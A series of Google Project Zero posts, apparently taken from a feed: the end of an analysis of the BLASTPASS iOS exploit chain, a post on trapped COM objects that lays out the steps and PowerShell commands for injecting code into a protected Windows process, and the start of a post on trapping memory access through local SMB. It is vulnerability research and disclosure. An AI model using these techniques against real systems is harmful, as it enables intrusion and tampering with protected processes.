    When a CFReadStream is passed to CFRelease, it will call __CFStreamDeallocate:

    static void __CFStreamDeallocate(CFTypeRef cf) {

      struct _CFStream *stream = (struct _CFStream *)cf;

      const struct _CFStreamCallBacks *cb =

        _CFStreamGetCallBackPtr(stream);

      CFAllocatorRef alloc = CFGetAllocator(stream);

      _CFStreamClose(stream);

    _CFStreamGetCallBackPtr just returns the CFStream's callBacks field:

    CF_INLINE const struct _CFStreamCallBacks *_CFStreamGetCallBackPtr(struct _CFStream *stream) {

        return stream->callBacks;

    }

    Here's _CFStreamClose:

    CF_PRIVATE void _CFStreamClose(struct _CFStream *stream) {

      CFStreamStatus status = _CFStreamGetStatus(stream);

      const struct _CFStreamCallBacks *cb =

        _CFStreamGetCallBackPtr(stream);

      if (status == kCFStreamStatusNotOpen || 

          status == kCFStreamStatusClosed ||

           (status == kCFStreamStatusError &&

            __CFBitIsSet(stream->flags, HAVE_CLOSED)

          ))

      {

        // Stream is not open from the client's perspective;

        // do not callout and do not update our status to "closed"

        return;

      }

      if (! __CFBitIsSet(stream->flags, HAVE_CLOSED)) {

            __CFBitSet(stream->flags, HAVE_CLOSED);

            __CFBitSet(stream->flags, CALLING_CLIENT);

        if (cb->close) {

          cb->close(stream, _CFStreamGetInfoPointer(stream));

        }

    _CFStreamGetStatus extracts the status bitfield from the flags field:

    #define __CFStreamGetStatus(x) __CFBitfieldGetValue((x)->flags, MAX_STATUS_CODE_BIT, MIN_STATUS_CODE_BIT)

    Looking at the 1MB object again the flags field is the first non-base field:

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......|

    00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............|

    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....|

    00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    That gives a status code of 0x1f with all the other flags bits clear. This gets through the two conditional branches to reach this close callback call:

      if (cb->close) {

        cb->close(stream, _CFStreamGetInfoPointer(stream));

      }

    At this point we need to switch to looking at the assembly to see what's really happening:

    __CFStreamClose

    var_30= -0x30

    var_20= -0x20

    var_10= -0x10

    var_s0=  0

    PACIBSP

    STP             X24, X23, [SP,#-0x10+var_30]!

    STP             X22, X21, [SP,#0x30+var_20]

    STP             X20, X19, [SP,#0x30+var_10]

    STP             X29, X30, [SP,#0x30+var_s0]

    ADD             X29, SP, #0x30

    MOV             X19, X0

    BL              __CFStreamGetStatus

    CBZ             X0, loc_187076958

    The fake CFReadStream is the first argument to this function, so passed in the X0 register. It's then stored into X19 so it survives the call to __CFStreamGetStatus.

    Skipping ahead past the flag checks we reach the callback callsite (this is also the crash site seen earlier):

    LDR             X8, [X19,#0x30]

    ...

    LDR             X8, [X8,#0x58]

    CBZ             X8, loc_187076758

    LDR             X1, [X19,#0x28]

    MOV             X0, X19

    BLRAAZ          X8

    Let's walk through each instruction in turn there:

    First it loads the 64-bit value from X19+0x30 into X8:

    LDR             X8, [X19,#0x30]

    Looking at the hexdump of the 1MB object above this will load the value 0x25846ec20.

    From the crash reports we know the runtime ASLR slide of the MessagesBlastDoorService when this exploit was thrown was 0x3A8D0000, so subtracting that we can figure out where in the shared cache this pointer should point:

    0x25846ec20-0x3A8D0000=0x21DB9EC20

    It points into the __const segment of the TextToSpeechMauiSupport library in the shared cache:

    Assembly code snippet with the memory address 000000021DB9EC20 highlighted, followed by DataSectionWriter function definitions.

    The next instruction adds 0x58 to that TextToSpeechMauiSupport pointer and reads a 64-bit value from there:

    LDR             X8, [X8,#0x58] // x8 := [0x21DB9EC20+0x58]

    This loads the pointer to the function _DataSectionWriter_CommitDataBlock from 0x21DB9EC78.

    IDA is simplifying something for us here: the function pointer loaded there is actually signed with the A-family instruction key with a zero context. This signing happens transparently (either during load or when the page is faulted in).

    The remaining four instructions then check that the pointer wasn't NULL, load X1 from offset +0x28 in the fake 1MB object, move the pointer to the fake object back into X0 and call the PAC'ed _DataSectionWriter_CommitDataBlock function pointer via BLRAAZ:

    CBZ             X8, loc_187076758

    LDR             X1, [X19,#0x28]

    MOV             X0, X19

    BLRAAZ          X8

    Callback-Oriented Programming

    A well-known attack against PAC is to swap two valid, PAC'ed pointers which are signed in the same way but point to different places (e.g. swapping two function pointers with different semantics, allowing you to exploit those semantic differences).

    Since a large number of PAC-protected pointers are signed with the A-family instruction key with a zero-context value, there are a large number of pointers to choose from. "Just" having an ASLR defeat shouldn't be enough to achieve this though; surely you'd need to disclose the actual PAC'ed pointer value? But that's not what happened above.

    Notice that the CFStream objects don't directly contain the callback function pointers — there's an extra level of indirection. The CFStream object contains a pointer to a callback structure, and that structure has the PAC'd function pointers. And crucially: that first pointer, the one to the callbacks structure, isn't protected by PAC. This means that the attackers can freely swap pointers to callback structures, operating one-level removed from the function pointers.

    This might seem like a severe constraint, but the dyld_shared_cache is vast and there are easily enough pre-existing callback structures to build a "callback-oriented JOP" chain, chaining together unsigned pointers to signed function pointers.

    The initial portion of the payload is a large callback-oriented JOP chain which is used to bootstrap the evaluation of the next payload stage, a large NSExpression.

    Similarities

    There are a number of similarities between this exploit chain and PWNYOURHOME, an earlier exploit also attributed by CitizenLab to NSO, described in this blog post in April 2023.

    That chain also had an initial stage targeting HomeKit, followed by a stage targeting MessagesBlastDoorService and also involving a MakerNote object — the Citizen Lab post claims that at the time the MakerNote was inside a PNG file. My guess would be that that PNG was being used as the delivery mechanism for the MakerNote bplist heap grooming primitives discussed in this post.

    Based on Citizen Lab's description it also seems like PWNYOURHOME was leveraging a similar callback-oriented JOP technique, and it seems likely that there was also a HomeKit-based ASLR disclosure. The PWNYOURHOME post has a couple of extra details around a minor fix which Apple made, preventing parsing of "certain HomeKit messages unless they arrive from a plausible source." But there still aren't enough details to figure out the underlying vulnerability or primitive. It seems likely to me that the same issue, or a variant thereof was still in use in BLASTPASS.

    Key material

    Matthias from iVerify presented an initial analysis of the NSExpression payload at BlackHat Asia in April 2024. In early July 2024, Matthias and I took a closer look at the final stages of the NSExpression payload which decrypts an AES-encrypted NSExpression and executes it.

    It seems very likely that the encrypted payload contains a BlastDoor sandbox escape. Although the BlastDoor sandbox profile is fairly restrictive it still allows access to a number of system services like notifyd, logd and mobilegestalt. In addition to the syscall attack surface there's also a non-trivial IOKit driver attack surface:

    ...

    (allow iokit-open-user-client

            (iokit-user-client-class "IOSurfaceRootUserClient")

            (iokit-user-client-class "IOSurfaceAcceleratorClient")

            (iokit-user-client-class "AGXDevice"))

    (allow iokit-open-service)

    (allow mach-derive-port)

    (allow mach-kernel-endpoint)

    (allow mach-lookup

            (require-all

                    (require-not (global-name "com.apple.diagnosticd"))

                    (require-any

                            (global-name "com.apple.logd")

                            (global-name "com.apple.system.notification_center")

                            (global-name "com.apple.mobilegestalt.xpc"))))

    ...

    (This profile snippet was generated using the Cellebrite labs' fork of SandBlaster)

    In FORCEDENTRY the sandbox escape was contained directly in the NSExpression payload (though that was an escape from the less-restrictive IMTranscoderAgent sandbox). This time around it seems extra care has been taken to prevent analysis of the sandbox escape.

    The question is: where does the key come from? We had a few theories:

    • Perhaps the key is just obfuscated, and by completely reversing the NSExpression payload we can find it?
    • Perhaps the key is derived from some target-specific information?
    • Perhaps the key was somehow delivered in some other way and can be read from inside BlastDoor?

    We spent a day analysing the NSExpression payload and concluded that the third theory appeared to be the correct one. The NSExpression walks up the native stack looking for the communication ports back to imagent. It then hijacks that communication, effectively taking over responsibility for parsing all subsequent incoming requests from imagent for "defusing" of iMessage payloads. The NSExpression loops 100 times, parsing incoming requests as XPC messages, reading the request xpc dictionary then the data xpc data object to get access to the raw, binary iMessage format. It waits until the device receives another iMessage with a specific format, and from that message extracts an AES key which is then used to decrypt the next NSExpression stage and evaluate it.

    We were unable to recover any messages with the matching format and therefore unable to analyse the next stage of the exploit.

    Conclusion

    In contrast to FORCEDENTRY, BLASTPASS's separation of the ASLR disclosure and RCE phases mitigated the need for a novel weird machine. Whilst the heap groom was impressively complicated and precise, the exploit still relied on well-known exploitation techniques. Furthermore, the MakerNote bplist groom and callback-JOP PAC defeat techniques appear to have been in use for multiple years, based on similarities with Citizenlab's blogpost in 2023, which looked at devices compromised in 2022.

    Enforcing much stricter requirements on the format of the bplist inside the MakerNote (for example: a size limit or a strict-parser mode which rejects duplicate keys) would seem prudent. The callback-JOP issue is likely harder to mitigate.

    The HomeKit aspect of the exploit chain remains mostly a mystery, but it seems very likely that it was somehow involved in the ASLR disclosure. Samuel Groß's post "A Look at iMessage in iOS 14" in 2021, mentioned that Apple added support for re-randomizing the shared cache slide of certain services. Ensuring that BlastDoor has a unique ASLR slide could be a way to mitigate this.

    This is the second in-the-wild NSO exploit which relied on simply renaming a file extension to access a parser in an unexpected context which shouldn't have been allowed.

    FORCEDENTRY had a .gif which was really a .pdf.

    BLASTPASS had a .png which was really a .webp.

    A basic principle of sandboxing is treating all incoming attacker-controlled data as untrusted, and not simply trusting a file extension.

    This speaks to a broader challenge in sandboxing: that current approaches based on process isolation can only take you so far. They increase the length of an exploit chain, but don't necessarily reduce the size of the initial remote attack surface. Accurately mapping, then truly reducing the scope of that initial remote attack surface should be a top priority.

    • ✇Project Zero
    • Windows Bug Class: Accessing Trapped COM Objects with IDispatch Google Project Zero
      Posted by James Forshaw, Google Project Zero Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you c
       

    Windows Bug Class: Accessing Trapped COM Objects with IDispatch

    30 de Janeiro de 2025, 14:57

    Posted by James Forshaw, Google Project Zero

    Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.

    This flexibility has a number of downsides, one of which is the topic of this blog, the trapped object bug class. Not all objects which can be remoted are necessarily safe to do so. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution.

    There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox.

    Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference and the platform chooses by reference as the default mechanism, For example the FileInfo and DirectoryInfo .NET classes are both serializable, so can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending to the server a serialized form of the object which when deserialized will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally the attacker can call methods on the object, such as creating new files which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool.

    The final scenario I'll mention as it has the most relevancy to this blog post is abusing the built in mechanisms the remoting technology uses to lookup and instantiate objects to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug which exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.

    Where Does IDispatch Fits In?

    The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX.

    To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context.

    The ITypeInfo interface exposes two interesting methods that can be called by a client, Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes, as it's not supported for remoting, it can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable, this will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially the created object will be in the server's process, not the client.

    However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface represents any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, therefore calling CreateInstance will just return an error. However, the type library can also store information of "CoClass" types. These types define the CLSID of the object to create, and so calling CreateInstance will succeed.

    How can we go from the interface type information object, to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module, first we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation.

    PS> $cls = Get-ComClass -Service

    PS> $cls | % { Get-ComInterface -Class $_ | Out-Null }

    PS> $cls | ? { $true -in $_.Interfaces.InterfaceEntry.IsDispatch } | 

            Select Name, Clsid

    Name                                       Clsid

    ----                                       -----

    WaaSRemediation                            72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    Search Gathering Manager                   9e175b68-f52a-11d8-b9a5-505054503030

    Search Gatherer Notification               9e175b6d-f52a-11d8-b9a5-505054503030

    AutomaticUpdates                           bfe18e9c-6d87-4450-b37c-e02f0b373803

    Microsoft.SyncShare.SyncShareFactory Class da1c0281-456b-4f14-a46d-8ed2e21a866f

    The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces, we don't need the output from this command as the queried interfaces are stored in the Interfaces property. Finally we select out any COM class which exposes IDispatch resulting in 5 candidates. Next, we'll pick the first class, WaasRemediation and inspect its type library for interesting classes.

    PS> $obj = New-ComObject -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    PS> $lib = Import-ComTypeLib -Object $obj

    PS> Get-ComObjRef $lib.Instance | Select ProcessId, ProcessName

    ProcessId ProcessName

    --------- -----------

        27020 svchost.exe

    PS> $parsed = $lib.Parse()

    PS> $parsed

    Name               Version TypeLibId

    ----               -------- ---------

    WaaSRemediationLib 1.0      3ff1aab8-f3d8-11d4-825d-00104b3646c0

    PS> $parsed.Classes | Select Name, Uuid

    Name                          Uuid

    ----                          ----

    WaaSRemediationAgent          72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    WaaSProtectedSettingsProvider 9ea82395-e31b-41ca-8df7-ec1cee7194df

    The script creates the COM object and then uses the Import-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef then extracting the process information, showing it running in an instance of svchost.exe which is the shared service executable. Inspecting the type library through the interface is painful, to make it easier to display what classes are supported, we can parse the library into an easier to use object model with the Parse method. We can then dump information about the library, including a list of its classes.

    Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service.

    I inspected the other 4 COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible, they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look:

    PS> $parsed.ReferencedTypeLibs

    Name   Version TypeLibId

    ----   ------- ---------

    stdole 2.0     00020430-0000-0000-c000-000000000046

    PS> $parsed.ReferencedTypeLibs[0].Parse().Classes | Select Name, Uuid

    Name       Uuid

    ----       ----

    StdFont    0be35203-8f91-11ce-9de3-00aa004bb851

    StdPicture 0be35204-8f91-11ce-9de3-00aa004bb851

    PS> $cls = Get-ComClass -Clsid 0be35203-8f91-11ce-9de3-00aa004bb851

    PS> $cls.Servers

               Key Value

               --- -----

    InProcServer32 C:\Windows\System32\oleaut32.dll

    In the example we can use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry for the stdole which is basically always going to be imported. If you're lucky, maybe there's other libraries that are imported that you can inspect. We can parse the stdole library to inspect its list of classes. There's two classes that are exported by the type library, if we inspect the servers for StdFont we can see that it is only specified to be creatable in process, we now have a target class to look for bugs. To get an out of process interface for the stdole type library we need to find a type which references it. The reason for the reference is that common interfaces such as IUnknown and IDispatch are defined in the library, so we need to query the base type of an interface we can directly access.  Let's try to create the object in the COM service.

    PS> $iid = $parsed.Interfaces[0].Uuid

    PS> $ti = $lib.GetTypeInfoOfGuid($iid)

    PS> $href = $ti.GetRefTypeOfImplType(0)

    PS> $base = $ti.GetRefTypeInfo($href)

    PS> $stdole = $base.GetContainingTypeLib()

    PS> $stdole.Parse()

    Name   Version TypeLibId

    ----   ------- ---------

    stdole 2.0     00020430-0000-0000-c000-000000000046

    PS> $ti = $stdole.GetTypeInfoOfGuid("0be35203-8f91-11ce-9de3-00aa004bb851")

    PS> $font = $ti.CreateInstance()

    PS> Get-ComObjRef $font | Select ProcessId, ProcessName

    ProcessId ProcessName

    --------- -----------

        27020 svchost.exe

    PS>  Get-ComInterface -Object $Obj

    Name                 IID                                  HasProxy   HasTypeLib

    ----                 ---                                  --------   ----------

    ...

    IFont                bef6e002-a874-101a-8bba-00aa00300cab True       False

    IFontDisp            bef6e003-a874-101a-8bba-00aa00300cab True       True

    We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process, the results shows its trapped in the service process. As a final check we can query for the object's interfaces to prove that it's a font object.

    Now we just need to find a way of exploiting one of these two classes, the first problem is only the StdFont object can be accessed. The StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead.

    This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox but an initial analysis of ones accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont, to point to any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script.

    Still, injection techniques are not something I'd usually discuss on this blog, that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride:

    PS> $cls = Get-ComClass -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32

    PS> $cls.AppIDEntry.ServiceProtectionLevel

    WindowsLight

    When we inspect the protection level for the hosting service it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.

    Protected Process Injection

    I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background of previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary and so they won't generally fix any bugs in a security bulletin in a timely manner, but they might choose to fix it in a new version of Windows.

    The idea is simple, we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running the protected process. Choosing to use StdFont should be more generic as we could move to using a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution which also works in a protected process.

    Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged about how .NET DCOM is exploitable, and shouldn't be used, but in this case we want the buggyness.

    The blog post discussed exploiting serialization primitives, however there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array which would bypass the signature checking and give full control over the protected process.

    Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information, we can just enable DCOM reflection in the registry by writing the AllowDCOMReflection with the DWORD value of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process.

    The following steps need to be taken to achieve injection:

    1. Enable DCOM reflection in the registry.
    2. Add the TreatAs key to redirect StdFont to the System.Object COM class.
    3. Create the WaaSRemediationAgent object.
    4. Use the type library to get the StdFont class type info.
    5. Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.
    6. Use .NET reflection to call the System.Reflection.Assembly::Load method with a byte array.
    7. Create an object in the loaded assembly to force code to execute.
    8. Cleanup all registry changes.

    You'll need to do these steps in a non .NET language as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you can probably do it from things like Python if you're so inclined. I'm not going to make the PoC available but the code is very similar to the exploit I wrote for CVE-2014-0257, that'll give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework which is no longer installed by default. Rather than mess around with getting this working with v4 I just installed v2 from the Windows components installer.

    My PoC worked first-time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on the object failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point but I wanted to know what was failing on Windows 11. Lets finish up with diving into that, to see if we could do something to get it to work on the latest version of Windows.

    The Problem with Windows 11

    I was able to prove that the issue was related to protected processes, if I changed the service registration to run unprotected then the PoC worked. Therefore there must be something blocking the loading of the library when specifically running in a protected process. This didn't seem to impact type libraries generally, the loading of stdole worked just fine, so it was something specific to .NET.

    After inspecting the behavior of the PoC with Process Monitor it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what's happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to get loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick.

    Digging into oleaut32.dll I found the offending fix, the VerifyTrust method is shown below:

    NTSTATUS VerifyTrust(LoadInfo *load_info) {

      PS_PROTECTION protection;

      BOOL is_protected;

     

      CheckProtectedProcessForHardening(&is_protected, &protection);

      if (!is_protected)

        return SUCCESS;

      ULONG flags;

      BYTE level;

      HANDLE handle = load_info->Handle;

      NTSTATUS status = NtGetCachedSigningLevel(handle, &flags, &level, 

                                                NULL, NULL, NULL);

      if (FAILED(status) || 

         (flags & 0x182) == 0 || 

         FAILED(NtCompareSigningLevels(level, 12))) {

        status = NtSetCachedSigningLevel(0x804, 12, &handle, 1, handle);

      }

      return status;

    }

    This method is called during the loading of the type library. It's using the cached signing level, again something I mentioned in the previous blog post, to verify if the file has a signing level of 12, which corresponds to Windows signing level. If it doesn't have the appropriate cached signing level the code will try to use NtSetCachedSigningLevel to set it. If that fails it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note, a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion.

    Based on the output from Get-AuthenticodeSignature the mscorlib.tlb file is signed, admittedly with a catalog signing. The signing certificate is Microsoft Windows Production PCA 2011 which is exactly the same certificate as the .NET Runtime DLL so there should be no reason it wouldn't get a Windows signing level. Let's try and set the cached signature level manually using my NtObjectManager PowerShell module to see if we get any insights:

    PS> $path = "C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"

    PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path

    Exception calling "SetCachedSigningLevel" with "4" argument(s): "(0xC000007B) - {Bad Image}

    %hs is either not designed to run on Windows or it contains an error. Try installing the program again using the

    original installation media or contact your system administrator or the software vendor for support. Error status 0x"

    PS> Format-HexDump $path -Length 64 -ShowAll

              00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF

    -----------------------------------------------------------------------------

    00000000: 4D 53 46 54 02 00 01 00 00 00 00 00 09 04 00 00  - MSFT............

    00000010: 00 00 00 00 43 00 00 00 02 00 04 00 00 00 00 00  - ....C...........

    00000020: 25 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - %...............

    00000030: 2E 0D 00 00 33 FA 00 00 F8 08 01 00 FF FF FF FF  - ....3...........

    Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of type library file shows that it's a raw type library rather than packaged in a PE file. This is fairly uncommon on Windows, even when a file has the extension TLB it's common for the type library to still be packed into a PE file as a resource. I guess we're out of luck, unless we can set a cached signing level on the file, it will be blocked from loading into the protected process and we need it to load to support the stub class to call the .NET interfaces over DCOM.

    As an aside, oddly I have a VM of Windows 11 with the non-DLL form of the type library which does work to set a cached signing level. I must have changed the VM's configuration in some way to support this feature, but I've no idea what that is and I've decided not to dig further into it.

    We could try and find a previous version of the type library file which is both validly signed, and is packaged in a PE file, however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution but I'd set my heart on this approach. In the end the solution was simpler than I expected, for some reason the 32 bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it.

    PS> $path = "C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb"

    PS> Format-HexDump $path -Length 64 -ShowAll

              00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF

    -----------------------------------------------------------------------------

    00000000: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  - MZ..............

    00000010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  - ........@.......

    00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................

    00000030: 00 00 00 00 00 00 00 00 00 00 00 00 B8 00 00 00  - ................

    PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path

    PS> Get-NtCachedSigningLevel $path -Win32Path

    Flags               : TrustedSignature

    SigningLevel        : Windows

    Thumbprint          : B9590CE5B1B3F377EAA6F455574C977919BB785F12A444BEB2...

    ThumbprintBytes     : {185, 89, 12, 229...}

    ThumbprintAlgorithm : Sha256

    Thus to exploit on Windows 11 24H2 we can swap the type library registration path from the 64 bit version to the 32 bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us so we don't need to do anything to make it work. Even though it's technically a different version of the type library, it doesn't make any difference for our use case and the stub generator code doesn't care.

    Conclusions

    I discussed in this blog post an interesting type of bug class on Windows, although it is applicable to any similar object-orientated remoting cross process or remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries.

    While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level it allows access to the majority of processes running protected including LSASS. We saw that Microsoft has done some work to try and mitigate existing attacks such as type library type-confusions, but in our case this mitigation shouldn't have blocked the load as we didn't need to change the type library itself. While the attack required admin privilege, the general technique does not. You could modify the local user's registration for COM and .NET to do the attack as a normal user to inject into a PPL if you can find a suitable COM server exposing IDispatch.

    • ✇Project Zero
    • Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update) Google Project Zero
      Posted by James Forshaw, Google Project Zero Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel. The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Fil
       

    Windows Exploitation Tricks: Trapping Virtual Memory Access (2025 Update)

    30 de Janeiro de 2025, 14:57

    Posted by James Forshaw, Google Project Zero

    Back in 2021 I wrote a blog post about various ways you can build a virtual memory access trap primitive on Windows. The goal was to cause a reader or writer of a virtual memory address to halt for a significant (e.g. 1 or more seconds) amount of time, generally for the purpose of exploiting TOCTOU memory access bugs in the kernel.

    The solutions proposed in the blog post were to either map an SMB file on a remote server, or abuse the Cloud Filter API. This blog isn't going to provide new solutions, instead I wanted to highlight a new feature of Windows 11 24H2 that introduces the ability to abuse the SMB file server directly on the local machine, no remote server required. This change also introduces the ability to locally exploit vulnerabilities which are of the so-called "False File Immutability" bug class.

    All Change Please

    The change was first made public, at least as far as I know, in this blog post. Microsoft's blog post described this change in Windows Insider previews, however it has subsequently shipped in Windows 11 24H2 which is generally available.

    The TL;DR; is the SMB client on Windows now supports specifying the destination TCP port from the command line's net command. For example, you can force the SMB client to use port 12345 through the command net use \\localhost\c$ /TCPPORT:12345. Now accessing the UNC path \\localhost\c$\blah will connect through port 12345 instead of the old, fixed port of 445. This feature works from any user, administrator access is not required as it only affects the current user's logon session.

